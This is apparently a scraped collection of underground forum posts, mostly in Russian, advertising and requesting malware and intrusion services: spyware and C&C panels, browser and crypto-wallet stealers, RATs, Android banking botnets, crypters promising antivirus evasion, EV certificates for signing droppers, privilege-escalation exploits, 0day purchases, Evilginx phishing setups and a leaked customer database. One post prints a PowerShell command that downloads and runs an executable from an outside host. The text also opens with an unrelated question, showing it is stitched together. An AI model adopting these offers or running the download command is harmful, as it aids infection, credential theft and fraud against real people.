Я ищу мышь для Android. Я нашел много людей, которые ее продают, и многие из них — мошенники. Многие функции пиратских версий использовать невозможно. Также содержит вирусы. . Есть ли официальная оригинальная версия? Я не могу сказать, какой из них официальный, а какой фейковый. Так потерял дар речи
Presentation:
I present a spyware made from scratch and built in "C", apart from being a SpyWare, it can be categorised as a C&C, by default 5 simultaneous connections are allowed.
Functions :
This SpyWare/C&C is full of options, we can do things like this:
Remarcable:
Suggestions can be requested, if you want a customised function just for you the price will be discussed and said in advance.
Basic Plans :
Basic 1: Get malware and server in binary format with 5 simultaneous connections and only available (shell, dowload/upload, lowpersistence, password dump) (Changing the IP of attacker)
Basic 2: Get malware and server in binary format with 20 simultaneous connections and only available (shell, exec, dowload/upload, lowpersistence, check, check avs, password dump) (Changing the IP of attacker and the crypto wallets)
Basic 3: Get malware and server in binary format with 50 simultaneous connections (shell, exec, dowload/upload, sysinformation, persistence, lowpersistence, check, check avs, password dump) (Changing the IP of attacker and the wallets)
Advanced Plans :
Advanced 1: Get malware and server in binary format with 100 simultaneous connections with all function available (Changing the IP of attacker and the crypto wallets to change in clipboard)
Advanced 2: Get malware and server in binary format with 500 simultaneous connections with all function available (Changing the IP of attacker and the crypto wallets to change in clipboard)
Advanced 3: Get malware and server in binary format with 1000 simultaneous connections with all function available (Changing the IP of attacker and the crypto wallets to change in clipboard)
For those who choose an advanced plan, updates will be sent as ‘support’ for the malware.
Master Plan :
Get the complete source code with README.md which explains step by step the following:
As an extra we share an ‘autocompile.py ’ that allows to compile everything automatically when the dependencies have been installed.
Contact Method and Payment form:
The payment process can be do it in XMR preferably we can discuss it in PM. For contact methods i have session and qtox.
Buying IOT/SERVER 0days RCE
Routers
Dvrs
ipcams
servers
Doesnt matter, contact promptly and quickly on TG or DM.
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.cdn- telegram.org%2Ffile%2FYpnVUIrCzJFWNq2ed5knPd8filb2PkuoNIuG0zXAh1JQ7tqG-j5qAflNpV2F3owyM-0eObyVPfXJFd_CofbaqfdOWk9zhxqrA_7_wH3zMgVAIcP0eYFBA9ncP22KFN-8D0HzKS9v4ajut7zE8NFgvFt_Da_zJpHf- oGHQmZcV43_S0ogfaRbbvfr7VIkV9iWPr5bvgqCIp- kioOathL1gpjpnlpAAG0frdTUZQUzaRS_QjAqnWCu5PKUAksPDcLbzSlwE0HY1_j9Swe9oGz2zEu2Qk5Xbjyko6YxGDl-0BFHqJeTlvX01A6K9Uw1ZwdgsJaDkGIC-7ULQL5tesgIcw.jpg&hash=41f9dbe9c343900e53fe1cca7bcd3325&return_error=1)
Professional Nigga
t.me
ONLY ESCROW, BUDGET 50k$, LOOKING TO BUY MULTIPLE
MUST HAVE OVER 5k DEVICE PER 0DAY
Куплю EV сертификат, сделки только через гарант форума.
Need to spread my file as shown in the video,
more like push to download
Hit me up, will pay
Напишу под заказ Evilginx конфиг под ваш сайт, любой сложности.
- реализую 2FA
- вход по QR коду
- перехват логина и пароля
- перехват сессии (вход в аккаунт без палева)
- отправка лога на ваш сайт/почту/бота
Цена обсуждается отдельно под каждый проект. Минимальная цена 100$
Блек лист : банки, палка
Также готов настроить ваш сервер и домены, сделать отдельную веб страницу с редиректом на фиш, настройка почтового сервера и инструмента для рассылки.
Цена настройки вашего сервера - от 500$
+ Обход WD + Cloud 10 / 11
+ Уникальный стаб
+ Иконка по желанию
+ Остук на iplogger
PS: Криптую только x32
No malware scan
От центров из Microsoft Trusted Root Program
Прайс в PM
Сделка через гаранта
Доброго времени суток. На данный момент разрабатываю ратник. Ратник на powershell 5.1 (работает на win8+). Стартуется exe-лоадером, который поднимается до системы (в наличии, самопис. Есть проблемы с детектами некоторыми АВ, но не дефом). Базовая версия (расширенная требует дальнейшей работы, но функционал будет на несколько голов выше) готова на 70-80%, дальнейшая реализация зависит от пожеланий клиента (-ов).
Базовая версия:
Расширенная версия:
Я не даю более детальное описание, поскольку в реализации использованы нестандартные подходы. Я бы не хотел всем мимопроходящим анонимам раскрывать фишки, которые позволяют моей софтине выполнять задачи, свойственные hVNC, при этом делать это сильно проще и скрытнее от пользователя и АВ. Также сильно упрощен крипт: от вас потребуется криптовать только лоадер, все остальное криптуется мной.
На данный момент я ищу будущих клиентов, которые будут готовы проспонсировать дальнейшую разработку. Все банально: я кодер и многое могу запилить, но не очень ориентируюсь в рынке. Я дошел до этапа, когда не уверен, что именно требуется от моего софта. Я не любитель распыляться, потому идеально было бы найти одного хорошего и знающего, что он хочет клиента и взаимовыгодно сотрудничать долгие годы.
Софт в дальнейшем предполагается сдавать в аренду. В будущем рассматривается 3-4 адекватных клиентов, которые будут бережно относиться к софту: не лить на него мусор, вовремя сообщать о проблемах, чистить лоадер и не допускать утечки в багтрекеры и лабы. Но я не возражаю работать с кем-то одним, кто продемонстрирует необходимые компетенции и предоставит мотивирующую фин. компенсацию.
На текущий момент я открыт к предложениям. Поскольку требования уважаемого ресурса предполагают конкретику, скажу, что разработка мне интересна за $5к+ в месяц. Сроки будут прямо зависеть от ваших пожеланий. Базовая версия может быть завершена в считанные недели. Более продвинутая будет развиваться поэтапно и в несколько иные сроки. Дальнейшие условия по аренде будут обсуждаться на месте, исходя из ситуации и интересов сторон. Сорсами я не поделюсь, но свои вложения вы многократно отобьете. Также вы всегда будете приоритетным клиентом на этот софт (к примеру, если я не не потяну несколько клиентов, этим единственным клиентом будете вы).
В качестве поручительства за себя я могу предложить взглянуть на мою регу, репу и тот факт, что по мою душу не было ни одного поста в арбитраже. Все просто: я не берусь за вещи, которые не тяну, не обижаю и тем более не кидаю людей, с которыми сотрудничаю. В случае конфликтных ситуаций предпочитаю улаживать их взаимовыгодным образом, а не идти в бычку. Впрочем, все вышесказанное не отменяет моей готовности работать через гаранта.
С уважением.
Зачем вам тисяча мануалов по работе в сети? Когда все можно автоматизировать а
не искать команды в Google и покупать маны по 10к....
Pentest Panel - что дает панель:
+++
1. AdFind - получаешь готовый батник в один клик
2. Dump Kerberos (Rubeus)
3. Wmic or Psexec раскидка
4. Full LDAP dump (IP, Servers, and etc)
5. Раскидка файла под LOCK
6. dcSync
7. Очистка логов
8. Dump DC
9. Чеклист Сети и тд
10. Drop EDR (пока в доработке есть несколько файлов для убийства процесов
EDR) - Sentinel, TrendMicro, CrowdStrike.
+++
Также есть грабер паролей в домене, и правильний поиск паролей от VMware ESXi
Ищу логи стилеров на условиях подписки. Напишите мне лично
Ищу крипт на андроид
Тз крипт кракс 6.7 версия
Нужен крипт, после чего крипт загноятся в дропер и повтрный крипт, нужно чтобы
гпз пропускало
Контакт для связи @MORF3YCE
SSbot - coded in c++ fud x64
- hvnc
- keylogger
- firefox password reader
PHP web panel
- screenshot
- ftp upload
-dl to bots
100$ btc source code
My telegram: https://t.me/jacxgam
Hook Android Botnet - надежный программный инструмент, который обладает широким набором функций, он предоставляет возможность получить доступ и незаметно контролировать различные функции целевого устройства. От управления экраном и записи звонков до контроля сообщений и просмотра контактов, отличается стабильным режимом "призрака" и возможностями обхода, особенно полезными для безопасных приложений, таких как банкинг и криптовалюты.
Имеется команда "File Manager" которая превращает вредоносную программу в файловый менеджер, позволяя получать список всех файлов, хранящихся на устройстве, и загружать определенные файлы по своему выбору. Также существует система отслеживания геолокации позволяет операторам Hook отслеживать точное местоположение жертвы, злоупотребляя разрешением "Доступ к точным координатам".
Hook распространяется как APK для Google Chrome и под другими разными прогами. Целевые банковские приложения Hook затрагивают пользователей в США, Испании, Австралии, Польше, Канаде, Турции, Великобритании, Франции, Италии и Португалии.
С новыми обновлениями и функциями, которые мы добавили своими руками, мы превратили в лучшего и полноценного убийцу андроидов с более чем 300 функциями и VNC-контролем. Те, кому интересно, те, кто хочет демо, могут связаться со мной, мы готовы отразить все виды поддержки и реализма.
Вы можете связаться со мной, чтобы узнать информацию и особенности Hook и получить желаемую информацию и поддержку.
Андройд 9-14 ( но 14 версии не все входит, даёт ошибку. Работаем над
устранением проблемы) инжекты как у оригинального сотфа + можем добавить по
желанию любой интересующий. Тех поддержку дадим при необходимости
Имеется тест на работоспособность
Продажа 50 к $
Продаю исходники криптора так как занялся другой деятельностью и нет времени
заниматься криптовкой файлов.
Лоадер написан на чистом Си. Для сборки используется Python. Для работы
криптора необходима установка Visual Studio и Python.
Криптор работает с EXE и DLL, архитектура - x86\x64, поддержка нативных
файлов, .NET и шеллкод.
В крипт встроен обход эмуляции АВ и EDR через сисколлы и снятие хуков на
системных DLL, реализован обход ETW и AMSI.
Полностью оригинальный код.
Цена - 10.000$, продажа в одни руки, через Гаранта.
Для связи писать в личку.
I have a very good VNC private software, but the disadvantage of my software is that it cannot record the passwords of some banks. I want to add it to my VNC software. I am looking for a seller. If you know him, please leave his contact information. Thank you.
плачу за крутое рабочие решение
Задача убрать алерт хрома. Контакты пм
Selling White Snake spyware/stealer src. (Decryptor/Panel/Stub/License server)
For more info just google or write pm here.
Escow only.
Spoiler: Closed on deposit: $5000
The bootloader in question does exactly what you'd expect it to do. This boatloader will also set something up which allows the runtime framework to execute kernel code / functions without a driver running. Not even admin rights are needed to execute kernel code. Completely from usermode, you can call any Kernel API/code .
This framework allows the following:
- Call any kernel function without admin rights
- Write to memory anywhere to any process
- Completely UD for any AV / AC / EDR on the market
This is a perfect framework for anyone looking to stay completely under the radar while still having the functionalities of a fully fledged driver.
Ищу крипт в формате pdf/doc/xlsx
Цена за стаб до 10к $
Пишите в тг или в pm
Строго через гаранта!
tg @Efemooo
del
Ищу кто может сделать FUD socks5 server,запуск ps1+обфускация,или рассмотрю уже готовое решения
Подпишу ваш дроппер/лоадер файл валидным, без детеков EV сертификатом для
обхода SmartScreen, Browser alerts.
Сразу скидывайте линк с рантайм сканом.
Первым трем за 150$.
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FJABqeEcMSdbrts-uNRIdU2907VkLy- EIeAsWgftWRGvfoeB2GuuogdF6Dlmf-1zkFCLXVg4jgIJ4oE9tcGjzjVyRc16ZMqh_BkV_5A68FVwCSBlpPisUTxMqkgpCK3OrabH-84il3C0qCfVNQxmbPYUb0hy78y5rPdOk8Ts9z9T9xiu8A1urG4ZAVnFeVMiWBqEHUhPOohvqFi8w-CbxypU8iUow9va8jgDHg6yiA1-3G6dbvrDlZJhii96Ki5R5Ccf3DEiqopNMnp- XlbyVoocQQXtNC4BEZ9Jz0of0CIaUUZlELiesJpo2AYth7WtHaL- MJILUzRtyUkDcx_3MEg.jpg&hash=85882b6153ae160820f9e4777f46e5b9&return_error=1)
You can contact @vxinfected right away.
t.me
Написали свой лодырь, инжектим вирус через PowerShell
Spoiler: Команда в shell
powershell -Command "Invoke-WebRequest -Uri 'http://t41.kz/a.exe' -OutFile '$envEMP\a.exe'; Start-Process '$envEMP\a.exe'
Аф палит скрипт, начинает ругаться.
код ошибки:
Spoiler: ошибка дефендераl
wacatac.h1m
Нам нужно обойти все это дело, заплачу 200$ в гаранта.
Приветствую всех! Продаю исходники MacOs стилера, писали под себя, но сейчас не актуально, потому продаю. Работает со всеми последними версиями ситемы6 грипповать не нужно, отдаю с поддержкой кодеров, опиши примерно что делает, более подробно ответит на вопросы прогрею который писал если нужны технические данные
Работает с такими браузерами, собирает куки и сохранённые пароли
Safari, Chrome, Firefox, Brave, Edge, Yandex, Opera
Крипто кошельки и плагины
Electrum, Coinomi, Exodus, Binance, Atomic
Отстук в панель телеграмма: управления логами так же имеется
Цена 25к usdt (максимум 2 копии), первая связь ПМ
Сделка строго через гаранта, что бы все проверили протестили и убедились в работоспособности софта
Ищу малварь под отработку логов ВНЦ + граб + стилак
От 100 ботов в день спам
Приветствую. Куплю любые RCE Windows эксплоиты начиная от 2020 года. С предложениями в ЛС. Только через гаранта данного форума.
Description:
- The software is written in C#.
- Collects the most important information about your PC: HWID, BSSID, RAM,
CPU, GPU, BIOS caption, MAC address, HDD, IP.
- Collects cookies, passwords and forms in browsers: Chromium, Geko, Edge,
Firefox, Yandex, Opera/GX, Slimjet, EpicPrivacy, Vivaldi, Iridium, UR Browser,
Comodo, Google Chrome, Brave Software
- Discord collection (client + token + account id, account nickname, mail,
linked phone)
- collection of VPNs (5 services)
- collection of FTP services (FileZilla + Total Commander)
- collection of crypto wallets ( 15 services )
- support for Windows 7, 8, 8.1, 10, 11
- build weight ( ready exe file ) 260KB
- When writing the software used only standard C# libraries (easy to crypt
build)
- Steam collection
- collection of sessions of more than 15 minecraft launchers
- screenshot of the victim's main screen
Покупаю. Первый контакт ПМ
от 500$. Оценка по кол-ву вулнов
Ищу варианты белого закрепа на основе легитимного софта, с минимальным количеством детектов, инсталяцию можно производить с помощью ps1 скрипта.
Spoiler: Закрыто на депозит. Closed for deposit. 2600$
Сдам в аренду RAT на основе белого софта
Просмотр \ перехват управления
- Поддержка мультимониторов
- Файл менеджер (загрузить \ скачать \ запустить \ просмотреть)
- Массовая подгрузка файла
- Скрытая работа в cmd\powershell
- Редактирование реестра
- Блокировка мыши \ клавиатуры
- Выключение \ перезагрузка
- Скриншот
- Передача буфера обмена
- Поддержка Win 7 - 11 + серверные ОС
- После успешной установки софт доверенный для большинства АВ
- боты живут долго, отваливается только если спалит холдер
- если АВ спалит ваш грязный файл - RAT не будет убит по цепочке.
- подойдет для прогрузов 100-200ботов в сутки, так же по таргету через лоадер
- подходит под уник(google/facebook/bing)
Вес билда 3мб
- у файла есть белый сертификат от разработчика если грузить без изменений
самого билда
- за доп плату добавлю хвнц
Раз в месяц чистка бесплатно, далее 50$ за файл
Работа по СНГ строго запрещена
Вы получаете готовую панель на сервере + 1 чистка в месяц бесплатно. Помогу
настроить файл под разные методы доставки
Софт ставлю на свои сервера
Кол-во мест ограничено 0/3
Первый контакт в лс. Гарант xss или экспы всегда приветствуется
Есть в наличии инсталы
Европа от 1к$ - 1000установок
Микс от 110$ - 1000установок
Уник Микс мира от 1.6$ за установку
Уник Т1 страны - от 6$
Могу оформить все под ключ через гаранта за ваш счет.
64Гб ОЗУ, 100 Мбит сеть, скорость будет около 10000 в минуту( может быстрее ), чекает Forti, Cisco.(допишу под дополнительные бесплатно)
300$
ядрах 64Гб ОЗУ, 100 Мбит сеть, скорость будет около 5000 в минуту( может быстрее ).
500$
Нет привязок, или ограничений, копируйте и запускайте где угодно и сколько
угодно, исходный код открыт.
Не имеет графического интерфейса, ТОЛЬКО КОНСОЛЬ, ТОЛЬКО ХАРДКОР!
Требования: Debian 12
️Представляем наш кастомизируемый дроппер!
Создайте свой собственный загрузчик, используя наш телеграм бот билдер. С помощью удобного интерфейса вы можете легко:
Вкладка "Dropper (загрузчик)" в бот билдере позволит вам:
Для тех, кто не в курсе, что такое дроппер:
Дроппер - это специальная программа, которая служит для распространения APK- файлов, часто используемых для:
Действуют новогодние скидки!
Buying an exploit that allows me to modify files on a wd nas ex2 ultra os5 or that gives me some kind of admin privilege, I don't know the exact version but it is between 2021-2022, I offer $3000
There are several vulnerabilities that have come out but without POC, if someone is able to create one this is your chance, nas not vulnerable to CVE-2021-44142
Всем привет!
Есть опыт работы с трафиком на определённый БА. Мат падает в формате: cc, data, svv, bill.
Хочу развиваться дальше, поэтому планирую перевести этот оффер с простого 2D-материала на 3D-материал или полный доступ к КАБа. Что можете посоветовать?
Может быть, стоит взять какую-то панель в работу и начать лить трафик на тот же оффер, но уже через панель, а не через простой одностраничный лендос с отступом в ТГ?
Нужна помощь в вопросе, как лучше монетизировать оффер.
Умею качественно отливать на этот оффер. Готов взять в команду опытного “партизанчика”.
Если нужно что-то уточнить или дополнить, дайте знать!
Hello Fellows!
After GroupIB report on DragonForce RW https://www.group- ib[.]com/blog/dragonforce-ransomware/ we gain lots of internal info from DragonForce servers.
Source Code, Affiliates, and more.
For more info contact me throw this platform.
Buy it directly: https://satoshidisk.com/pay/CMZ53C
Only 3 people can buy.
WhoWeAre: Bell
EVERY DAY FULLY UNDETECTABLE RESULTS!
**• Updated : 8/12/2024 ✔
• Scan Results
https://avcheck.net/id/vWrxipaPDCR6
✔
• OPTIONS
- Compatible with .Net or Native All File
- Compiler [Roslyn & Codedome]
- Startup [Hidden Or Registry]
- Injection [Runs hidden in task manager as inject with Windows file]
- Sleep [You can delay the execution of the encrypted file]
- Icon Changer [You can change the icon of your file]
- Obfuscator [Makes Your File Stay FUD Longer by Complicating Its Codes]
- Pumper [Increases the Size of Your File and Makes Your File More
Undetectable]
• CONTACT ME
- **https://t.me/styxencode
Hello, XSS.IS Community,
I am offering a zero-day exploit for the OwnCloud product. This exploit affects all versions and is available for exclusive sale.
If you are interested and can make serious offers, please contact me via TOX.
TOX : 7C877772B71E1C1FC9B7AB5B5CE84B68DDA970A7D927F21A851C7F391101F1168C585AE09F21
Looking forward to your messages.
Best regards
Spoiler: Закрыто на депозит. Closed for deposit. 10000$.
EV сертификаты Globalsign, Digisert, SSL.com
Стоимость серта $3500, установлен на токен. Гарант
Есть вариант заказа по предоплате, срок до 14 дней, цена $2500. Полная
предоплата
Скидки за заказ нескольких сертификатов обсуждаемы. Гарантий на срок жизни не даю.
Нужен многопоточный-шустрый массчекер списка IP:PORT на наличие на нём VPN.
порты рандом не только 443, 10443. списки десятки..сотни GB. если это
проблема, можем подробить списки к нужному размеру.
Ищу готовый софт, так и кодера возмется за написание софта/скрипта!
Вознаграждаение обсуждаемо!
Так же прошу поделиться полезной инфой в этом направлении.
[USER - > SYSTEM]
Продается в одни руки LPE(Local Privilege Escalation) (x64 и x86)
Локальное повышение привилегий происходит от Medium integrity(NT
Authority\USER) до System integrity(NT Authority\SYSTEM).
Т.е. из USER повышаемся до SYSTEM.
Включены ВСЕ привилегии:
Софт без зависимостей (чистый C + Native API). Вес в виде exe - 32кб. Возможна
модернизация под ваши нужды в виде exe, dll, lib.
Софт работает с установленными AV\EDR: WinDefender (+for Endpoint Server),
TrendMicro (ApexOne), Symantec, Avast, Panda, Sophos.
Проверялось на следующих ОС:
Десктопных: Windows 7 - Windows 11 24H2 (последняя версия);
Серверных: Windows Server 2016 - 2025 (последняя версия).
Стоимость исходных кодов 70k$. Только в одни руки через Гаранта форума!
Для школьников и деятелей из западных AV контор:
It's serious. Don't waste my time. No samples without a full deposit on the
Escrow service of this forum!
Конкретные предложения и вопросы -только а ЛС форума, там я после
предварительного собеседования выдам свой контакт,
если посчитаю это необходимым. Здесь в топике на вопросы не отвечаю, так как
все что нужно описал, а потенциальный покупатель
получит всю интересующую его информацию в личной переписке.
ADD: после выходных добавлю демо - видео.
I'm looking for a FUD usermode av killer + dropper
to support Windows Defender
optional: Eset, Malwarebytes.
for Home computers, not corporations.
Escrow only.
im looking to buy a lifetime subscription to redline or can someone point me in the right direction to start with a month
Anyone interesting with buy C2 Tool such as bruteratel (BRc4), cobaltstrike and some private tools, contact to me, tele @str0ng3r9
Нужен человек, который сможет написать на PS код с функционалом, аналогичным
коду на GO (клиентская часть реверсивного прокси)
Знание GO, хотя бы, на уровне "понимаю о чем тут речь" - приветствуется
Подробности обсудим в ПМ
Я покупаю чистые исходные коды проекта XWorm RAT (последнюю версию с плагинами), если они у вас есть, отправьте мне сообщение.
RU :
Продам метод распространения вируса через RDP (дедик)!
Схема полностью личная! Нигде подобного не встретите!
1. Жертва заражается сразу при коннекте к дедику (3sec на заражение)
2. Работает с любым софтом
3. Вирусу выдаются админ права
4. Перед выгрузкой вируса добавляется исключение в деф весь диск C (также по
запросу могу добавить в скрипт исключения Kaspersky, Avast, AVG, ESET NOD32)
Могу продать полностью метод настройки + готовый ленд, работа через гарант XSS ++ .. продажа в одни руки если предложите норм цену!
UK :
Offering a method for spreading a virus via RDP!
The scheme is completely private! You won't find anything like this elsewhere!
1. The victim gets infected immediately upon connecting to the dedicated server (3 seconds for infection).
2. Works with any software.
3. The virus is granted admin rights.
4. Before deploying the virus, an exception is added to Defender for the entire C drive (upon request, I can also add exceptions for Avast, AVG, ESET NOD32 in the script).
I can sell the full setup method + a ready-made landing page, working through an XSS guarantor ++ .. sale to one person only if you offer a decent price!
Доброго времени суток ! Команда из 10 опытных отработчиков хочет перейти с логов на андроид ботов, посему ищет актуальный, рабочий, можно не дешевый малварь под Андроид в аренду. Просьба людей которые захотят толкнуть мне не рабочий софт с соседних веток не писать !!! Перебрал этих софтов штук 10, почти каждый в глаза знаю.
Что мы ищем:
1)Рабочий и актуальный софт(Андроид ботнет), с рабочими инъекциями, VNC, перехватом сообщений и так далее.
3)Дропер для 13.00+ версий Андроид
4)Код не покупаем !! Мы не кодеры, нам сразу нужна рабочая панель и возможность самим создавать билд.
Что мы имеем:
1)Траф - есть микс, но можем точечно под страну сделать
2)Свои приемки, дропы и наработки по различным сервисам по всему миру, а так же сим свап под юсу.
Кроме фикса за месяц готовы сверху обсудить %.
Работу начнем только после теста, перед тестом заливаем гаранта, условия обсуждаемы.
Spoiler: Закрыто на депозит: $2000
Инструмент : Легкий в использовании (AdFind,Rubeus, dcSync,LDAP dump,
drop file on domain + Kill SentinelOne EDR/XDR and ETC tools)
Мануал : Простые шаги и советы, которые помогут даже новичкам.
Поддержка : Всегда готов помочь с вопросами.
Продается только билд не соурс код ʕ ᵔᴥᵔ ʔ
Сабж. Работа на вин10/11, серверные, запуск шелл код, пш, ехе, длл. Дроппер js
exe
можно без закрепа, но с закрепом тоже не плохо. хороший саппорт
Люди с софтом куда по счастливому истечению обстоятельств падают почему-то
только хуевые боты МИМО! Крысы тоже туда же.
Можно поработать на взаимовыгодных условиях. Источник спам.
Dropper source available for people who run traffic outside of play store . Accessibility Restriction bypassed all the version .Source is written in c++ ndk
Куплю 0day for Win срочно
Гарант
Проверка, свежее видео на последних обновах системы
Любые суммы
For Sale Here: <https://scrubcrypt.su/products/Scrubs-Private-Spreading- Method>
Ищу криптор под APK, FUD
Сделка только через местного гаранта
По выполнению в личку
as the title above i am looking for a tool to automatically register Gmail, X,
Discord, Telegram, etc... accounts
Can anyone please inbox me or contact telegram.
I only deal with XSS's guarantor
Уважаемые форумчане ! Ищу человека который может сделать сборку NetSupport с сохранением всех подписей, без лишнего мусора.
Бюджет От: 500$
первоначальная связь в PM.
Spoiler: Закрыто на депозит. Closed for deposit.
Price :
The first 3 crypts are $39, each subsequent one is $49 ( Semi-Private)
99$ per 1 file ( Your personal stub )
_We 're also giving away a crypt for a you review!_
**_- We have been bypassing windows defender for a long time with our unique
sandbox and emulator bypassing systems.
- Stub is generated every crypt
- Each of our crypt has the strongest uniqueness.
- We use manual process memory loading with a unique antidump system,
allowing your stub to live much longer.
- We guarantee you FUD scantime
- We guarantee you bypassing the WD_**
SCANTIME:
RUNTIME:
Please ignore ESET, it has been successfully removed in the new stubs.
CONTACT:
Telegram or PM
нужен криптер кто будет криптовать данабот. ПМ пожалуйста
Spoiler: Closed on deposit / Закрыто на депозит: $10 000
SPYSOLR PRIVATE EDITION:
• Hello everyone, unfortunately, spysolr.com will not be returning. Even if it could, it would likely face suspension due to repeated reports.
• However, Spysolr is still available in a private edition!
• How can you get Spysolr?
• For a one-time payment of 5K, you will receive:
- A dedicated private server
- A custom domain of your choice
- Wildcard SSL certificate .
- A panel to add, remove, or update clients
- Full implementation and ongoing maintenance by me
- A minimal annual fee to cover server and service renewals
• In summary:
- I will set up your own website (e.g.,
yourdomain.com) and install Spysolr on it for
you.
- It’s your server and your domain, with no one else knowing about it. As long as you keep it private, that’s the best approach to avoid issues.
- The website will consist only of a login page and a panel page, not like the original website.
- You can create multiple accounts for your partners or friends if needed.
Additionally, any future updates or features I develop will be rolled out directly to your private server.
RU
Характеристики: antiDebug, antiVM поддерживают только исполняемые файлы, я
могу добавить некоторые функции, если вы хотите связаться через TOX
Вы можете попросить об испытании
Гарант привeтствуется и поощряет
ENG
Written in Rust
Features: antiDebug,antiVM support only executable files, I can add some
features if you want contact through TOX
You can ask for a test
Escrow is welcomed and encourage
[ / ] Многофункциональный Майнер [ / ]
/// Скрытый Майнер - программа для майнинга монеты на своём ПК, используя официальную начинку XMrig от пулов. Используется в целях фонового майнинга на своих устройств, для комфортного пользования. Не предназначен для чужих ПК с целью нарушения прав.
VERSION [AIR]
VERSION [MAX]
VERSION [ULTRA]
ПРАЙС:
VERSIONAIR****— 200$****
VERSIONMAX— 350$
**VERSION ULTRA **— 600$
Telegram:****
**t.me/Lotok1
Канал:**
t.me/Dark3Market
Spoiler: Закрыто на депозит | Closed For Deposit | 1500$
Привет мой сосисочный друг!
Разглагольствовать не буду долго.
Требования: Админ права(на запуск файла, первоначальный)
Версия софта V14
Полная настройка софта и гейтов.
Полную информацию об функциональности софта можно найти тут -> Google.com
Можно криптовать(нужно криптовать 2 файла)
Hello my sausage friend!
I will not talk long.
Requirements: Admin right (to launch the file, initial)
Soft V14 version
Settings for you of software and gates.
Full information about the functionality of software can be found here ->
Google.com
You can crypt (you need to crypt 2 files)
Detect scantime: DrWeb, Forti.
гарант приветствуется/guarant welcome
contact:
DAB30747E4650B1D71A30E199FE07AED62239661B7EFA109AFA8E0821690D12B2FF84CE2A114
mr.bang@exploit.im
Price: $ 500
We will send the simple android rat I want, we just want you to spread it. We will share the logs in return. I am waiting for those who are interested to write.
Ребята, честно говоря, я не уверен в правильной ценовой политике для этого
лоадера. Поэтому предлагаю вам присылать свои ценовые предложения в личные
сообщения.
_**Кратко о лоадере: это JS-решение для массовых продаж с автоматической
обфускацией кода, предназначенное для работы с большими объемами трафика.
Данный продукт не использовался в массовых продажах и вообще просто лежал.
Работает в 2 клика.**_
Основные возможности:
С установкой готов помочь. Присылайте ваши предложения по цене в личку. Решение действительно интересное и перспективное.
Панель трафика:
дубляж темы на экспе: https://forum.exploit.in/topic/250323/
RU
Приветствую. Куплю рабочий приват 0day, LPE, Exploit под Windows. Гарант
Обязателен!
EN
Hello. I will buy a working private 0day, LPE, Exploit for Windows. Guarantor
is required!
Spoiler: Закрыто на депозит. Closed for deposit. 800$
Telegram Mini App with Ton Connect
This app connects users TON wallet to your mini app, allowing you to initiate transactions from user wallet to yours . It supports sending all TON amounts and other tokens in a single transaction.
Features:
Cost:
Contact:
Telegram or join Discord community:
Ищу человека или команду людей, кто имеет десктоп бота или лоадера своего,
есть трафик, готов обсудить варианты сотрудничества, Банки и крипта меня не
интересует, заберу только своих ботов и все, далее уже сами работайте с
материалом.
требования к боту : Отдельная панель именно для моих ботов, возможность
прогрузки и запуска exe/dll файлов.
Возможность сделать склейку вашего файла с каким либо софтом будет плюсом.
Есть свой кодер в команде если что. и есть два трафера. с вас по сути нужна
только панель, крипт и дальнейшая поддержка бота.
Готов внести в депозит или гарант данного форума. Нужны люди с репутацией.
Нужно зашифровать х64 файл для обхода EDR
Цена договорная, контакты в сообщения форума
Есть большой поток инсталлов с личного трафа. Нужен человек с вин ехе без
скринов - хрома и дефа.
Нужна сразу ссылка на выдачу, еще нужен тг канал с отстуком (айпи обяз, ост не
обяз). условия - 50/50 с отработки, если нет хвнц то не льем.
Траф тир1,2. Открытие ехе 95%.
Прошу писать в ПМ только по делу. Отправляйте сразу контакт.
Wyatt
Привлекательное предложение от Screen Connect!
высот благодаря технологиям, которых скорее всего еще нету у Ваших конкуренов! Мы гордимся представить наше непревзойденное предложение, которое перевернет взгляд на удаленное управление и обеспечит инструментами для максимально оперативного взаимодействия и производительности в работе с клиентами или бизнесом.
Давайте подробнее рассмотрим, что мы предлагаем и что включено в
предложение:
Мы отдаем в руки вашего бизнеса уникальное решение для удаленного контроля и
управления персональными компьютерами под ОС Windows, Linux и Mac OS, а также
Android(Beta test).
Персонально под вас разворачивается уникальная копия софта для удаленного
контроля. Персональный домен, учетные записи и только ваши клиенты - никто не
вмешивается в работу, а базы зашифрованы.
Более конкретно и детально:
Индивидуальный подход: Кастомная VPS, разработанный специально под вас,
где выполнены все пункты по безопасноти от брутфорса до шифрования базы данных
и серверов. Возможна интеграция с любыми другими системами удаленного
контроля, такими как Анидеск, и настройка расширений под ваши индивидуальные
потребности.
Основное меню программы
Простота и удобство: Наш софт обеспечивает "тихое" подключение к клиенту, мгновенное внедрение и возможность наблюдать, слушать, записывать экран клиента в полуавтоматическом режиме.
Основное рабочее окно #1
Основное рабочее окно #2
Гибкость и контроль: Отчеты о всех подключениях и отключениях, гибкая настройка прав работников на серверной части, возможность упорядочить клиентов по группам, подгруппам, названию и больше.
Таймскрин подключений
Просмотр активных учетных записей на ПК
Безопасность и надежность: Мы обеспечиваем защиту данных на сервере, возможность забирать и загружать файлы мимо рабочего стола клиента, а также полную информацию о клиенте, включая IP-адреса, установленные приложения, текущие процессы и многое другое.
Список установленных программ
Список запусщенных процессов
Основная информация о ПК. Инфо об IP скрыто
Поддержка различных платформ: Наше приложение работает как служба и доступно как для систем Windows, так и для Linux и MacOS.
$$$ PRICE $$$
В цену любой подписки входит :
Все оплаты фиксированы, скрытых и дополнительных оплат нет, дополнительные
сервисы предлагаются заранее оговорив их стоимость.
Минимизировать количество опций софта, следственно, снизить цену - невозможно.
Со своей стороны мы гарантируем превосходное качество услуг стабильность софта, прозрачность и надежность всех платежей, а также готовность предоставить дополнительные сервисы по вашему запросу. Не упустите возможность улучшить свой бизнес с SC уже сегодня!
Контакты:
Telegram - Wyatt
Skype - в разработке
Предлагаю созвониться для демонстрации возможностей программы. Если вы
пользуетесь AnyDesk, это софт перевернет Ваш мир и возможности!
------------------------------------------------------------------------------------------------------
Возможна полная продажа софта со всеми установщиками исходников инструкцией по
установки и также с полным объяснением что до чего, цена договорная, просьба
обращаться в лс t.me/offpaz
Нужен андроид разработчик, который сможет переписать CraxsRat под мое ТЗ (Билдер, и желательно саму панель тоже). Подробности в Telegram: karush_777
LEAKS :ecd.mx
DATE: 15.05.24
LINES:27.562.000 CUSTOMERS
FULL_DUMP = 38 GB
INDUMP:
